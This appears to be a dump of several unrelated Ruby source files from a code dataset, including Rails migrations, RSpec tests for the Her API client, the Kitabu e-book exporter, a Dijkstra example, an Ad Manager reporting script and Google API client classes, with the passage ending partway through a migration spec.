#spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
end
| 42.433333 | 87 | 0.653574 |
edb5dfe01239e2e85497c5c49cc0222cb91fd85f | 280 | class CreateTaggings < ActiveRecord::Migration[5.1]
def change
create_table :taggings do |t|
t.integer :todo_id, null: false
t.integer :tag_id, null: false
t.timestamps
end
add_index :taggings, :todo_id
add_index :taggings, :tag_id
end
end
| 20 | 51 | 0.671429 |
111d72042030dc6264b862ed2f320989964bf786 | 12,123 | # encoding: utf-8
require File.join(File.dirname(__FILE__), "../spec_helper.rb")
describe Her::Model::Parse do
context "when include_root_in_json is set" do
before do
Her::API.setup url: "https://api.example.com" do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
end
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { |env| [200, {}, { user: { id: 1, fullname: params(env)[:user][:fullname] } }.to_json] }
stub.post("/users/admins") { |env| [200, {}, { user: { id: 1, fullname: params(env)[:user][:fullname] } }.to_json] }
end
end
context "to true" do
before do
spawn_model "Foo::User" do
include_root_in_json true
parse_root_in_json true
custom_post :admins
end
end
it "wraps params in the element name in `to_params`" do
@new_user = Foo::User.new(fullname: "Tobias Fünke")
expect(@new_user.to_params).to eq(user: { fullname: "Tobias Fünke" })
end
it "wraps params in the element name in `.create`" do
@new_user = Foo::User.admins(fullname: "Tobias Fünke")
expect(@new_user.fullname).to eq("Tobias Fünke")
end
end
context "to a symbol" do
before do
spawn_model "Foo::User" do
include_root_in_json :person
parse_root_in_json :person
end
end
it "wraps params in the specified value" do
@new_user = Foo::User.new(fullname: "Tobias Fünke")
expect(@new_user.to_params).to eq(person: { fullname: "Tobias Fünke" })
end
end
context "in the parent class" do
before do
spawn_model("Foo::Model") { include_root_in_json true }
class User < Foo::Model; end
@spawned_models << :User
end
it "wraps params with the class name" do
@new_user = User.new(fullname: "Tobias Fünke")
expect(@new_user.to_params).to eq(user: { fullname: "Tobias Fünke" })
end
end
end
context "when parse_root_in_json is set" do
before do
Her::API.setup url: "https://api.example.com" do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
end
end
context "to true" do
before do
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { [200, {}, { user: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
stub.get("/users") { [200, {}, [{ user: { id: 1, fullname: "Lindsay Fünke" } }].to_json] }
stub.get("/users/admins") { [200, {}, [{ user: { id: 1, fullname: "Lindsay Fünke" } }].to_json] }
stub.get("/users/1") { [200, {}, { user: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
stub.put("/users/1") { [200, {}, { user: { id: 1, fullname: "Tobias Fünke Jr." } }.to_json] }
end
spawn_model("Foo::User") do
parse_root_in_json true
custom_get :admins
end
end
it "parse the data from the JSON root element after .create" do
@new_user = Foo::User.create(fullname: "Lindsay Fünke")
expect(@new_user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after an arbitrary HTTP request" do
@new_user = Foo::User.admins
expect(@new_user.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .all" do
@users = Foo::User.all
expect(@users.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .find" do
@user = Foo::User.find(1)
expect(@user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .save" do
@user = Foo::User.find(1)
@user.fullname = "Tobias Fünke"
@user.save
expect(@user.fullname).to eq("Tobias Fünke Jr.")
end
end
context "to a symbol" do
before do
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { [200, {}, { person: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
end
spawn_model("Foo::User") { parse_root_in_json :person }
end
it "parse the data with the symbol" do
@new_user = Foo::User.create(fullname: "Lindsay Fünke")
expect(@new_user.fullname).to eq("Lindsay Fünke")
end
end
context "in the parent class" do
before do
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { [200, {}, { user: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
stub.get("/users") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
end
spawn_model("Foo::Model") { parse_root_in_json true, format: :active_model_serializers }
class User < Foo::Model
collection_path "/users"
end
@spawned_models << :User
end
it "parse the data with the symbol" do
@new_user = User.create(fullname: "Lindsay Fünke")
expect(@new_user.fullname).to eq("Lindsay Fünke")
end
it "parses the collection of data" do
@users = User.all
expect(@users.first.fullname).to eq("Lindsay Fünke")
end
end
context "to true with format: :active_model_serializers" do
before do
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { [200, {}, { user: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
stub.get("/users") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
stub.get("/users/admins") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
stub.get("/users/1") { [200, {}, { user: { id: 1, fullname: "Lindsay Fünke" } }.to_json] }
stub.put("/users/1") { [200, {}, { user: { id: 1, fullname: "Tobias Fünke Jr." } }.to_json] }
end
spawn_model("Foo::User") do
parse_root_in_json true, format: :active_model_serializers
custom_get :admins
end
end
it "parse the data from the JSON root element after .create" do
@new_user = Foo::User.create(fullname: "Lindsay Fünke")
expect(@new_user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after an arbitrary HTTP request" do
@users = Foo::User.admins
expect(@users.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .all" do
@users = Foo::User.all
expect(@users.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .find" do
@user = Foo::User.find(1)
expect(@user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .save" do
@user = Foo::User.find(1)
@user.fullname = "Tobias Fünke"
@user.save
expect(@user.fullname).to eq("Tobias Fünke Jr.")
end
end
end
context "when to_params is set" do
before do
Her::API.setup url: "https://api.example.com" do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
builder.adapter :test do |stub|
stub.post("/users") { |env| ok! id: 1, fullname: params(env)["fullname"] }
end
end
spawn_model "Foo::User" do
def to_params
{ fullname: "Lindsay Fünke" }
end
end
end
it "changes the request parameters for one-line resource creation" do
@user = Foo::User.create(fullname: "Tobias Fünke")
expect(@user.fullname).to eq("Lindsay Fünke")
end
it "changes the request parameters for Model.new + #save" do
@user = Foo::User.new(fullname: "Tobias Fünke")
@user.save
expect(@user.fullname).to eq("Lindsay Fünke")
end
end
context "when parse_root_in_json set json_api to true" do
before do
Her::API.setup url: "https://api.example.com" do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
builder.adapter :test do |stub|
stub.get("/users") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
stub.get("/users/admins") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
stub.get("/users/1") { [200, {}, { users: [{ id: 1, fullname: "Lindsay Fünke" }] }.to_json] }
stub.post("/users") { [200, {}, { users: [{ fullname: "Lindsay Fünke" }] }.to_json] }
stub.put("/users/1") { [200, {}, { users: [{ id: 1, fullname: "Tobias Fünke Jr." }] }.to_json] }
end
end
spawn_model("Foo::User") do
parse_root_in_json true, format: :json_api
include_root_in_json true
custom_get :admins
end
end
it "parse the data from the JSON root element after .create" do
@new_user = Foo::User.create(fullname: "Lindsay Fünke")
expect(@new_user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after an arbitrary HTTP request" do
@new_user = Foo::User.admins
expect(@new_user.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .all" do
@users = Foo::User.all
expect(@users.first.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .find" do
@user = Foo::User.find(1)
expect(@user.fullname).to eq("Lindsay Fünke")
end
it "parse the data from the JSON root element after .save" do
@user = Foo::User.find(1)
@user.fullname = "Tobias Fünke"
@user.save
expect(@user.fullname).to eq("Tobias Fünke Jr.")
end
it "parse the data from the JSON root element after new/save" do
@user = Foo::User.new
@user.fullname = "Lindsay Fünke (before save)"
@user.save
expect(@user.fullname).to eq("Lindsay Fünke")
end
end
context "when include_root_in_json set json_api" do
before do
Her::API.setup url: "https://api.example.com" do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
end
Her::API.default_api.connection.adapter :test do |stub|
stub.post("/users") { |env| [200, {}, { users: [{ id: 1, fullname: params(env)[:users][:fullname] }] }.to_json] }
end
end
context "to true" do
before do
spawn_model "Foo::User" do
include_root_in_json true
parse_root_in_json true, format: :json_api
custom_post :admins
end
end
it "wraps params in the element name in `to_params`" do
@new_user = Foo::User.new(fullname: "Tobias Fünke")
expect(@new_user.to_params).to eq(users: [{ fullname: "Tobias Fünke" }])
end
it "wraps params in the element name in `.where`" do
@new_user = Foo::User.where(fullname: "Tobias Fünke").build
expect(@new_user.fullname).to eq("Tobias Fünke")
end
end
end
context "when send_only_modified_attributes is set" do
before do
Her::API.setup url: "https://api.example.com", send_only_modified_attributes: true do |builder|
builder.use Her::Middleware::FirstLevelParseJSON
builder.use Faraday::Request::UrlEncoded
end
Her::API.default_api.connection.adapter :test do |stub|
stub.get("/users/1") { [200, {}, { id: 1, first_name: "Gooby", last_name: "Pls" }.to_json] }
end
spawn_model "Foo::User" do
include_root_in_json true
end
end
it "only sends the attributes that were modified" do
user = Foo::User.find 1
user.first_name = "Someone"
expect(user.to_params).to eql(user: { first_name: "Someone" })
end
end
end
| 35.037572 | 124 | 0.601006 |
e917b47699289de0c62f3dbf4436b63905af9170 | 450 | require 'spec_helper'
describe CRDT::Between do
def assert_between(low, high, depth)
generated = CRDT::Between.string(low, high)
(generated > low).should be_true
(generated < high).should be_true
return if depth == 0
if rand(2) == 1
assert_between(low, generated, depth - 1)
else
assert_between(generated, high, depth - 1)
end
end
it "goes between ! and ~" do
assert_between "!", "~", 200
end
end | 23.684211 | 48 | 0.644444 |
089b987d681ae69fb071a6c5573bb0b714f05b35 | 2,047 | module Kitabu
class Exporter
def self.run(root_dir, options)
exporter = new(root_dir, options)
exporter.export!
end
attr_accessor :root_dir
attr_accessor :options
def initialize(root_dir, options)
@root_dir = root_dir
@options = options
end
def ui
@ui ||= Thor::Base.shell.new
end
def export!
helper = root_dir.join("config/helper.rb")
load(helper) if helper.exist?
FileUtils.rm_rf root_dir.join("output").to_s
export_pdf = [nil, "pdf"].include?(options[:only])
export_epub = [nil, "mobi", "epub"].include?(options[:only])
export_mobi = [nil, "mobi"].include?(options[:only])
export_txt = [nil, "txt"].include?(options[:only])
exported = []
exported << HTML.export(root_dir)
exported << PDF.export(root_dir) if export_pdf && Dependency.prince?
exported << Epub.export(root_dir) if export_epub
exported << Mobi.export(root_dir) if export_mobi && Dependency.kindlegen?
exported << Txt.export(root_dir) if export_txt && Dependency.html2text?
if exported.all?
color = :green
message = options[:auto] ? "exported!" : "** e-book has been exported"
if options[:open] && export_pdf
filepath = root_dir.join("output/#{File.basename(root_dir)}.pdf")
if RUBY_PLATFORM =~ /darwin/
IO.popen("open -a Preview.app '#{filepath}'").close
elsif RUBY_PLATFORM =~ /linux/
Process.detach(Process.spawn("xdg-open '#{filepath}'", :out => "/dev/null"))
end
end
Notifier.notify(
:image => Kitabu::ROOT.join("templates/ebook.png").to_s,
:title => "Kitabu",
:message => "Your \"#{config[:title]}\" e-book has been exported!"
)
else
color = :red
message = options[:auto] ? "could not be exported!" : "** e-book couldn't be exported"
end
ui.say message, color
end
def config
Kitabu.config(root_dir)
end
end
end
| 29.242857 | 94 | 0.595506 |
5d4564c10a72ddb5c8e32f3ebafab5bb62b581c0 | 1,011 | namespace :oneoff do
task :fix_user_district, [:email] => :environment do |t,args|
require 'csv'
email = args[:email]
csv_user_list_file = "#{email}/users_districs.csv"
rows_from_csv = CSV.parse(S3Wrapper.read(filename: csv_user_list_file), headers: true)
rows_from_csv.each do |row|
user_district = row.to_hash
user = User.find_by(email: user_district["Email"])
district = District.find_by(lea_id: user_district["Lea [Districts]"])
if user && district
puts "Adding User #{user.email} To #{district.name} district"
user.districts << district unless user.district_ids.include?(district.id)
if user.save
puts "Added Successfully"
else
puts "Some error came up while trying to add #{user.email} to #{district.name}: #{user.errors.full_messages}"
end
else
puts "User of district not found: #{user_district["Email"]} - #{user_district["Name [Districts]"]}"
end
end
end
end | 33.7 | 119 | 0.649852 |
bb9001fa0612dc5a7f38f28ef8ec7d680a32095f | 1,624 | # the graph
graph = {}
graph["start"] = {}
graph["start"]["a"] = 6
graph["start"]["b"] = 2
graph["a"] = {}
graph["a"]["fin"] = 1
graph["b"] = {}
graph["b"]["a"] = 3
graph["b"]["fin"] = 5
graph["fin"] = {}
# the costs table
costs = {}
costs["a"] = 6
costs["b"] = 2
costs["fin"] = Float::INFINITY
# the parents table
parents = {}
parents["a"] = "start"
parents["b"] = "start"
parents["fin"] = nil
@processed = []
def find_lowest_cost_node(costs)
lowest_cost = Float::INFINITY
lowest_cost_node = nil
# Go through each node.
costs.each do |node, cost|
# If it's the lowest cost so far and hasn't been processed yet...
if cost < lowest_cost && [email protected]?(node)
# ... set it as the new lowest-cost node.
lowest_cost = cost
lowest_cost_node = node
end
end
lowest_cost_node
end
# Find the lowest-cost node that you haven't processed yet.
node = find_lowest_cost_node(costs)
# If you've processed all the nodes, this while loop is done.
until node.nil?
cost = costs[node]
# Go through all the neighbors of this node.
neighbors = graph[node]
neighbors.keys.each do |n|
new_cost = cost + neighbors[n]
# If it's cheaper to get to this neighbor by going through this node...
if costs[n] > new_cost
# ... update the cost for this node.
costs[n] = new_cost
# This node becomes the new parent for this neighbor.
parents[n] = node
end
end
# Mark the node as processed.
@processed << node
# Find the next node to process, and loop.
node = find_lowest_cost_node(costs)
end
puts "Cost from the start to each node:"
puts costs
| 23.2 | 75 | 0.641626 |
39de58090f8bf79a77446d49ddc18ad04433518a | 56 | require "ci_status/cruise_control"
module CiStatus
end
| 11.2 | 34 | 0.839286 |
620c39fbf1f77c0fd4567b4c266682be03d41178 | 387 | $LOAD_PATH.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))
$LOAD_PATH.unshift(File.dirname(__FILE__))
require 'rspec'
require 'rspec/matchers'
require 'cron2english'
# Requires supporting files with custom matchers and macros, etc.,
# in ./support/ and its subdirectories.
Dir["#{File.dirname(__FILE__)}/support/**/*.rb"].each {|f| require f}
RSpec.configure do |config|
end
| 25.8 | 69 | 0.731266 |
38ee04ec0014b827cc2bdefaa434f0d51fb15d39 | 4,336 | module TransactionService::Store::Transaction
TransactionModel = ::Transaction
module_function
# booking validation happens before SQL BEGIN-COMMIT block
def create(tx_data)
tx_model = TransactionModel.new(tx_data.except(:content, :video, :booking_fields, :starting_page))
build_conversation(tx_model, tx_data)
build_booking(tx_model, tx_data)
tx_model.save
tx_model
end
def add_message(community_id:, transaction_id:, sender_id:, message:, counter_offer: nil)
tx_model = TransactionModel.where(community_id: community_id, id: transaction_id).first
if tx_model
tx_model.conversation.messages.create({content: message, sender_id: sender_id, counter_offer: counter_offer})
do_mark_as_unseen_by_other(tx_model, sender_id)
end
nil
end
# Mark transaction as unseen, i.e. something new (e.g. transition) has happened
#
# Under the hood, this is stored to conversation, which is not optimal since that ties transaction and
# conversation tightly together.
def mark_as_unseen_by_other(community_id:, transaction_id:, person_id:)
tx_model = TransactionModel.where(community_id: community_id, id: transaction_id).first
do_mark_as_unseen_by_other(tx_model, person_id) if tx_model
nil
end
def get(transaction_id)
TransactionModel.where(id: transaction_id, deleted: false).first
end
def get_in_community(community_id:, transaction_id:)
TransactionModel.where(id: transaction_id, community_id: community_id, deleted: false).first
end
def upsert_shipping_address(community_id:, transaction_id:, addr:)
tx_model = TransactionModel.where(id: transaction_id, community_id: community_id).first
if tx_model
address = tx_model.shipping_address || tx_model.build_shipping_address
if addr.is_a?(ActionController::Parameters)
addr = addr.permit(:name, :street1, :street2, :postal_code, :city, :country, :state_or_province)
end
address.update!(addr)
end
end
def delete(community_id:, transaction_id:)
tx_model = TransactionModel.where(id: transaction_id, community_id: community_id).first
if tx_model
tx_model.update_attribute(:deleted, true)
tx_model
end
end
def update_booking_uuid(community_id:, transaction_id:, booking_uuid:)
unless booking_uuid.is_a?(UUIDTools::UUID)
raise ArgumentError.new("booking_uuid must be a UUID, was: #{booking_uuid} (#{booking_uuid.class.name})")
end
tx_model = TransactionModel.where(community_id: community_id, id: transaction_id).first
if tx_model
tx_model.update(booking_uuid: UUIDUtils.raw(booking_uuid))
tx_model
end
end
def build_conversation(tx_model, tx_data)
conversation = tx_model.build_conversation(
tx_data.slice(:community_id, :listing_id, :starting_page))
conversation.participations.build(
person_id: tx_data[:listing_author_id],
is_starter: false,
is_read: false)
conversation.participations.build(
person_id: tx_data[:starter_id],
is_starter: true,
is_read: true)
if tx_data[:content].present?
conversation.messages.build({
content: tx_data[:content],
video: tx_data[:video],
sender_id: tx_data[:starter_id]})
end
end
def build_booking(tx_model, tx_data)
if is_booking?(tx_data)
if tx_data[:booking_fields][:per_hour]
start_time, end_time, per_hour = tx_data[:booking_fields].values_at(:start_time, :end_time, :per_hour)
tx_model.build_booking(
start_time: start_time,
end_time: end_time,
per_hour: per_hour)
else
start_on, end_on = tx_data[:booking_fields].values_at(:start_on, :end_on)
tx_model.build_booking(
start_on: start_on,
end_on: end_on)
end
tx_model.booking.tx = tx_model
end
end
def is_booking?(tx_data)
tx_data[:booking_fields] && ((tx_data[:booking_fields][:start_on] && tx_data[:booking_fields][:end_on]) ||
(tx_data[:booking_fields][:start_time] && tx_data[:booking_fields][:end_time]))
end
def do_mark_as_unseen_by_other(tx_model, person_id)
tx_model
.conversation
.participations
.where("person_id != '#{person_id}'")
.update_all(is_read: false)
end
end
| 32.601504 | 115 | 0.712177 |
5d1de41c902c7756f5f90e6fd8504f7998a3698c | 815 | require 'rails_helper'
module Utilities
RSpec.describe MatterTypeFinder do
describe '.call' do
subject { described_class.call(code) }
context 'successful lookup' do
before { subject }
context 'passed as a symbol' do
let(:code) { :DA002 }
it 'returns domestic abuse' do
expect(subject).to eq 'domestic_abuse'
end
end
context 'passsed as a string' do
let(:code) { 'SE013' }
it 'returns section8' do
expect(subject).to eq 'section8'
end
end
end
context 'non-existing proceeding type' do
let(:code) { 'XX024' }
it 'raises' do
expect { subject }.to raise_error KeyError, 'key not found: :XX024'
end
end
end
end
end
| 23.285714 | 77 | 0.558282 |
03545b61d4a697f95c260c0abc15345d6d728e2e | 3,476 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright:: Copyright 2011, Google Inc. All Rights Reserved.
#
# License:: Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example runs a report similar to the "Orders report" on the Ad Manager
# website with additional attributes and can filter to include just one order.
# To download the report see download_report.rb.
require 'ad_manager_api'
def run_delivery_report(ad_manager, order_id)
# Get the ReportService.
report_service = ad_manager.service(:ReportService, API_VERSION)
# Specify a report to run for the last 7 days.
report_end_date = ad_manager.today()
report_start_date = report_end_date - 7
# Create statement object to filter for an order.
statement = ad_manager.new_report_statement_builder do |sb|
sb.where = 'ORDER_ID = :order_id'
sb.with_bind_variable('order_id', order_id)
end
# Create report query.
report_query = {
:date_range_type => 'CUSTOM_DATE',
:start_date => report_start_date.to_h,
:end_date => report_end_date.to_h,
:dimensions => ['ORDER_ID', 'ORDER_NAME'],
:dimension_attributes => ['ORDER_TRAFFICKER', 'ORDER_START_DATE_TIME',
'ORDER_END_DATE_TIME'],
:columns => ['AD_SERVER_IMPRESSIONS', 'AD_SERVER_CLICKS', 'AD_SERVER_CTR',
'AD_SERVER_CPM_AND_CPC_REVENUE', 'AD_SERVER_WITHOUT_CPD_AVERAGE_ECPM'],
:statement => statement.to_statement()
}
# Create report job.
report_job = {:report_query => report_query}
# Run report job.
report_job = report_service.run_report_job(report_job);
MAX_RETRIES.times do |retry_count|
# Get the report job status.
report_job_status = report_service.get_report_job_status(report_job[:id])
break unless report_job_status == 'IN_PROGRESS'
puts 'Report with ID %d is still running.' % report_job[:id]
sleep(RETRY_INTERVAL)
end
puts 'Report job with ID %d finished with status "%s".' % [report_job[:id],
report_service.get_report_job_status(report_job[:id])]
end
if __FILE__ == $0
API_VERSION = :v202102
MAX_RETRIES = 10
RETRY_INTERVAL = 30
# Get AdManagerApi instance and load configuration from ~/ad_manager_api.yml.
ad_manager = AdManagerApi::Api.new
# To enable logging of SOAP requests, set the log_level value to 'DEBUG' in
# the configuration file or provide your own logger:
# ad_manager.logger = Logger.new('ad_manager_xml.log')
begin
order_id = 'INSERT_ORDER_ID_HERE'.to_i
run_delivery_report(ad_manager, order_id)
# HTTP errors.
rescue AdsCommon::Errors::HttpError => e
puts "HTTP Error: %s" % e
# API errors.
rescue AdManagerApi::Errors::ApiException => e
puts "Message: %s" % e.message
puts 'Errors:'
e.errors.each_with_index do |error, index|
puts "\tError [%d]:" % (index + 1)
error.each do |field, value|
puts "\t\t%s: %s" % [field, value]
end
end
end
end
| 33.747573 | 79 | 0.701381 |
eddb3fa42662c6c8bc3bb5f75b95f6dc7ccb5f97 | 10,485 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module CloudresourcemanagerV1beta1
class FolderOperationError
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListProjectsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class UndeleteProjectRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FolderOperation
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class GetIamPolicyRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class SetIamPolicyRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class TestIamPermissionsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Organization
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Policy
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ProjectCreationStatus
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class TestIamPermissionsRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ListOrganizationsResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class GetAncestryRequest
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class GetAncestryResponse
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Empty
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Ancestor
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class ResourceId
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Project
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class Binding
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class OrganizationOwner
class Representation < Google::Apis::Core::JsonRepresentation; end
include Google::Apis::Core::JsonObjectSupport
end
class FolderOperationError
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :error_message_id, as: 'errorMessageId'
end
end
class ListProjectsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :projects, as: 'projects', class: Google::Apis::CloudresourcemanagerV1beta1::Project, decorator: Google::Apis::CloudresourcemanagerV1beta1::Project::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class UndeleteProjectRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class FolderOperation
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :display_name, as: 'displayName'
property :source_parent, as: 'sourceParent'
property :destination_parent, as: 'destinationParent'
property :operation_type, as: 'operationType'
end
end
class GetIamPolicyRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class SetIamPolicyRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :policy, as: 'policy', class: Google::Apis::CloudresourcemanagerV1beta1::Policy, decorator: Google::Apis::CloudresourcemanagerV1beta1::Policy::Representation
end
end
class TestIamPermissionsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :permissions, as: 'permissions'
end
end
class Organization
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :lifecycle_state, as: 'lifecycleState'
property :display_name, as: 'displayName'
property :organization_id, as: 'organizationId'
property :name, as: 'name'
property :creation_time, as: 'creationTime'
property :owner, as: 'owner', class: Google::Apis::CloudresourcemanagerV1beta1::OrganizationOwner, decorator: Google::Apis::CloudresourcemanagerV1beta1::OrganizationOwner::Representation
end
end
class Policy
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :bindings, as: 'bindings', class: Google::Apis::CloudresourcemanagerV1beta1::Binding, decorator: Google::Apis::CloudresourcemanagerV1beta1::Binding::Representation
property :etag, :base64 => true, as: 'etag'
property :version, as: 'version'
end
end
class ProjectCreationStatus
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :ready, as: 'ready'
property :gettable, as: 'gettable'
property :create_time, as: 'createTime'
end
end
class TestIamPermissionsRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :permissions, as: 'permissions'
end
end
class ListOrganizationsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :organizations, as: 'organizations', class: Google::Apis::CloudresourcemanagerV1beta1::Organization, decorator: Google::Apis::CloudresourcemanagerV1beta1::Organization::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class GetAncestryRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class GetAncestryResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :ancestor, as: 'ancestor', class: Google::Apis::CloudresourcemanagerV1beta1::Ancestor, decorator: Google::Apis::CloudresourcemanagerV1beta1::Ancestor::Representation
end
end
class Empty
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class Ancestor
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :resource_id, as: 'resourceId', class: Google::Apis::CloudresourcemanagerV1beta1::ResourceId, decorator: Google::Apis::CloudresourcemanagerV1beta1::ResourceId::Representation
end
end
class ResourceId
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :type, as: 'type'
property :id, as: 'id'
end
end
class Project
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :parent, as: 'parent', class: Google::Apis::CloudresourcemanagerV1beta1::ResourceId, decorator: Google::Apis::CloudresourcemanagerV1beta1::ResourceId::Representation
hash :labels, as: 'labels'
property :lifecycle_state, as: 'lifecycleState'
property :create_time, as: 'createTime'
property :name, as: 'name'
property :project_number, as: 'projectNumber'
property :project_id, as: 'projectId'
end
end
class Binding
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :members, as: 'members'
property :role, as: 'role'
end
end
class OrganizationOwner
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :directory_customer_id, as: 'directoryCustomerId'
end
end
end
end
end
| 33.498403 | 204 | 0.645875 |
915397f0f4f9fac2798fd38cf153ca313d0de04f | 1,840 | # frozen_string_literal: true
require 'spec_helper'
require Rails.root.join('db', 'post_migrate', '20180913142237_schedule_digest_personal_access_tokens.rb')
describe ScheduleDigestPersonalAccessTokens, :migration do
let(:personal_access_tokens) { table(:personal_access_tokens) }
let(:users) { table(:users) }
before do
stub_const("#{described_class.name}::BATCH_SIZE", 4)
users.create(id: 1, email: '[email protected]', projects_limit: 10)
personal_access_tokens.create!(id: 1, user_id: 1, name: 'pat-01', token: 'token-01')
personal_access_tokens.create!(id: 2, user_id: 1, name: 'pat-02', token: 'token-02')
personal_access_tokens.create!(id: 3, user_id: 1, name: 'pat-03', token_digest: 'token_digest')
personal_access_tokens.create!(id: 4, user_id: 1, name: 'pat-04', token: 'token-04')
personal_access_tokens.create!(id: 5, user_id: 1, name: 'pat-05', token: 'token-05')
